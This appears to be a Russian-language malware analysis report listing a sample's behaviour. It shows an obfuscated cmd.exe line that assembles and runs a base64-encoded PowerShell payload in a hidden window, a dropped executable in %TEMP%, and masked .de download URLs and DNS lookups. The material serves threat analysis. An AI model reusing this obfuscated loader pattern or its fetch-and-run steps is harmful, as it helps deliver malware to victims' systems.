Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C "set %dErnZnncw%=p^owe^rs&&set %wVmiJHHEi%=he^ll&&!%dErnZnncw%!!%wVmiJHHEi%! -e JgAgACgAIAAkAFYAZQByAEIAbwBTAEUAcAByAEUAZgBlAHIAZQBOAGMARQAuAFQAbwBTAFQAUgBJAE4AZwAoACkAWwAxACwAMwBdACsAJwB...
- %TEMP%\52407.exe
- %TEMP%\52407.exe
- 'pu##l.de':80
- 're###-bhf.de':80
- 'an##ear.de':80
- 'pr###slumpp.de':80
- 'pr###slumpp.de':443
- http://pu##l.de/FndvIeH/
- http://re###-bhf.de/Lenter1/shFvxAVCx/
- http://an##ear.de/nbrZnq/
- http://pr###slumpp.de/EHw/
- 'pr###slumpp.de':443
- DNS ASK pu##l.de
- DNS ASK 3c##x.com
- DNS ASK re###-bhf.de
- DNS ASK an##ear.de
- DNS ASK pr###slumpp.de
- '<SYSTEM32>\cmd.exe' /V /C "set %dErnZnncw%=p^owe^rs&&set %wVmiJHHEi%=he^ll&&!%dErnZnncw%!!%wVmiJHHEi%! -e JgAgACgAIAAkAFYAZQByAEIAbwBTAEUAcAByAEUAZgBlAHIAZQBOAGMARQAuAFQAbwBTAFQAUgBJAE4AZwAoACkAWwAxACwAMwBdACsAJwB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAIAAkAFYAZQByAEIAbwBTAEUAcAByAEUAZgBlAHIAZQBOAGMARQAuAFQAbwBTAFQAUgBJAE4AZwAoACkAWwAxACwAMwBdACsAJwBYACcALQBKAE8AaQBOACcAJwApACgAIAAoACgAIAAzADYAIAAsACAAMQAxADkALAAxADEANQAgACwAOQA5AC...